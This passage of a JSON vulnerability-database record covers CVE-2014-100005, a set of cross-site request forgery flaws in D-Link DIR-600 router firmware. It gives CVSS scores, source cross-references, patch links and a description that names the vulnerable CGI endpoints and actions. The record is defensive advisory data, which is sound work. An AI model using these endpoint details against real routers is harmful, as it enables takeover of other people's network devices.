"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 6.8,
"id": "CNVD-2014-01581",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:S/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "VHN-68501",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2014-100005",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2014-01581",
"trust": 0.6,
"value": "LOW"
},
{
"author": "CNNVD",
"id": "CNNVD-201403-571",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-68501",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01581"
},
{
"db": "VULHUB",
"id": "VHN-68501"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-007601"
},
{
"db": "CNNVD",
"id": "CNNVD-201403-571"
},
{
"db": "NVD",
"id": "CVE-2014-100005"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple cross-site request forgery (CSRF) vulnerabilities in D-Link DIR-600 router (rev. Bx) with firmware before 2.17b02 allow remote attackers to hijack the authentication of administrators for requests that (1) create an administrator account or (2) enable remote management via a crafted configuration module to hedwig.cgi, (3) activate new configuration settings via a SETCFG,SAVE,ACTIVATE action to pigwidgeon.cgi, or (4) send a ping via a ping action to diagnostic.php. For item (2), remote administration can be enabled via a crafted configuration module sent to hedwig.cgi. The D-Link DIR-600 is a wireless routing device. Because the program allows users to perform certain operations through unauthenticated HTTP requests, an attacker can exploit the vulnerability to modify the configuration when a logged-in administrative user accesses a specially crafted web page.\nExploiting these issues may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks. D-Link DIR-600 is a SOHO wireless router product of D-Link.",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-100005"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-007601"
},
{
"db": "CNVD",
"id": "CNVD-2014-01581"
},
{
"db": "BID",
"id": "66092"
},
{
"db": "VULHUB",
"id": "VHN-68501"
}
],
"trust": 2.52
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2014-100005",
"trust": 3.3
},
{
"db": "SECUNIA",
"id": "57304",
"trust": 2.3
},
{
"db": "DLINK",
"id": "SAP10018",
"trust": 2.0
},
{
"db": "BID",
"id": "66092",
"trust": 0.9
},
{
"db": "JVNDB",
"id": "JVNDB-2014-007601",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201403-571",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2014-01581",
"trust": 0.6
},
{
"db": "XF",
"id": "91794",
"trust": 0.6
},
{
"db": "SEEBUG",
"id": "SSVID-89342",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-68501",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01581"
},
{
"db": "VULHUB",
"id": "VHN-68501"
},
{
"db": "BID",
"id": "66092"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-007601"
},
{
"db": "CNNVD",
"id": "CNNVD-201403-571"
},
{
"db": "NVD",
"id": "CVE-2014-100005"
}
]
},
"id": "VAR-201501-0347",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01581"
},
{
"db": "VULHUB",
"id": "VHN-68501"
}
],
"trust": 1.5148148
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT",
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01581"
}
]
},
"last_update_date": "2024-06-02T22:46:13.922000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP10018",
"trust": 0.8,
"url": "http://securityadvisories.dlink.com/security/publication.aspx?name=sap10018"
},
{
"title": "DIR-600_REVB_FIRMWARE_2.17.B02",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=57137"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-007601"
},
{
"db": "CNNVD",
"id": "CNNVD-201403-571"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-352",
"trust": 1.1
},
{
"problemtype": "Cross-site request forgery (CWE-352) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-68501"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-007601"
},
{
"db": "NVD",
"id": "CVE-2014-100005"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.4,
"url": "http://resources.infosecinstitute.com/csrf-unauthorized-remote-admin-access/"
},
{
"trust": 2.0,
"url": "http://securityadvisories.dlink.com/security/publication.aspx?name=sap10018"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/57304"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/91794"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-100005"
},
{
"trust": 0.8,
"url": "https://cisa.gov/known-exploited-vulnerabilities-catalog"
},
{
"trust": 0.6,
"url": "http://secunia.com/advisories/57304/"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/91794"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/bid/66092"
},
{
"trust": 0.3,
"url": "http://www.dlink.com/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01581"
},
{
"db": "VULHUB",
"id": "VHN-68501"
},
{
"db": "BID",
"id": "66092"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-007601"
},
{
"db": "CNNVD",
"id": "CNNVD-201403-571"
},
{
"db": "NVD",
"id": "CVE-2014-100005"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2014-01581"
},
{
"db": "VULHUB",
"id": "VHN-68501"
},
{
"db": "BID",
"id": "66092"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-007601"
},
{
"db": "CNNVD",
"id": "CNNVD-201403-571"
},
{
"db": "NVD",
"id": "CVE-2014-100005"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-03-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-01581"
},
{
"date": "2015-01-13T00:00:00",
"db": "VULHUB",
"id": "VHN-68501"
},
{
"date": "2014-03-10T00:00:00",
"db": "BID",
"id": "66092"
},
{
"date": "2015-01-15T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-007601"
},
{
"date": "2014-03-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201403-571"
},
{
"date": "2015-01-13T11:59:04.477000",
"db": "NVD",
"id": "CVE-2014-100005"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-03-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-01581"
},
{
"date": "2017-09-08T00:00:00",
"db": "VULHUB",
"id": "VHN-68501"
},
{
"date": "2014-03-10T00:00:00",
"db": "BID",
"id": "66092"
},
{
"date": "2024-05-31T06:43:00",
"db": "JVNDB",
"id": "JVNDB-2014-007601"
},
{
"date": "2015-01-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201403-571"
},
{
"date": "2024-05-18T01:00:01.410000",
"db": "NVD",
"id": "CVE-2014-100005"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201403-571"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link\u00a0DIR-600\u00a0 Cross-site request forgery vulnerability in router firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-007601"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "cross-site request forgery",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201403-571"
}
],
"trust": 0.6
}
}